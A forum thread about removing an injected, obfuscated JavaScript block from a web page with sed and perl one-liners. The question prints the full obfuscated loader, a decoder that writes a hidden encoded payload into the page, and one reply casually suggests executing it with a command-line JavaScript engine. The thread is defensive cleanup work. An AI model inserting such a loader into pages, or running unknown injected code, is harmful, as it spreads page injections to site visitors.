clear complex javascript code

Hi,

Please advise how can we clear the following javascript content from a file commandline, probably using awk or sed

File before removing the content.
################################
root@server1 [~]# cat index.html

This is a test page

<script language=JavaScript>function d(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,30,9,49,32,33,37,42,60,14,0,0,0,0,0,0,58,28,8,4,13,23,5,35,18,39,15,41,25,38,11,36,17,43,22,7,26,57,27,44,6,12,2,0,0,0,0,48,0,56,24,61,54,19,59,20,52,10,1,50,3,21,51,0,40,31,45,34,16,47,55,62,53,46,29);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}d("Lk8_EeYkoEpxEVYMZdAhPEcIi7phHNcsRSD3PnWxPnW3ZqD3luBnNJWkiTW_YGa3YuWszvzvNTW_YQ2hRl8xgib5HnA_PvYMZ9K4FdY_YNAnPGK4eib5RSDv2lYMZ9DnRn83YIYnPncIFdYnjSY_NfK4VMKsYJ8xCGY_VZ")</script> This is a testing page

root@server1 [~]#

File after removing the content.
################################
root@server1 [~]# cat index.html

This is a test page

This is a testing page

root@server1 [~]#

Thanks

SpiderMonkey (JavaScript-C) Engine

Save yourself a lot of trouble and just run the JS from the command line. Here's a quick-and-dirty tutorial.

sed '/<script language=JavaScript/,/<\/script>/d' index.html

this should clear the code, but it will also clear genuine or any other javascript codes.

The sed command above will also remove all lines completely, so if you have </script> followed by some literal text (as in the given example), the literal text will be removed, too.

You could use XSLT to properly parse and extract the parts of the file you want, or you could do something like

perl -0777 -pe 's%<script language=JavaScript>.*?</script>%%gs' index.html

Maybe you want to make the regular expression a bit more general if this is meant to be more than a one-off job;

perl -0777 -pe 's%<script\s+language="?JavaScript"?>.*?</script>%%gis' index.html

Incidentally, this is a frequently recurring question; search this site for threads about multi-line substitution or XML/HTML substitution.

era,

Excellent, you are bang on target. can extent you command to perform the operation on JavaScript enclosures only if that contain for example "cIFdYnjSY_NfK4VMKsYJ8xCGY_V Z"

Thanks

Something like this maybe?

perl -0777 -pe 's%<script\s+language="?JavaScript"?>.*?cIFdYnjSY_NfK4VMKsYJ8xCGY_V Z.*?</script>%%gis' index.html

era,

Perfect.

Thanks a ton.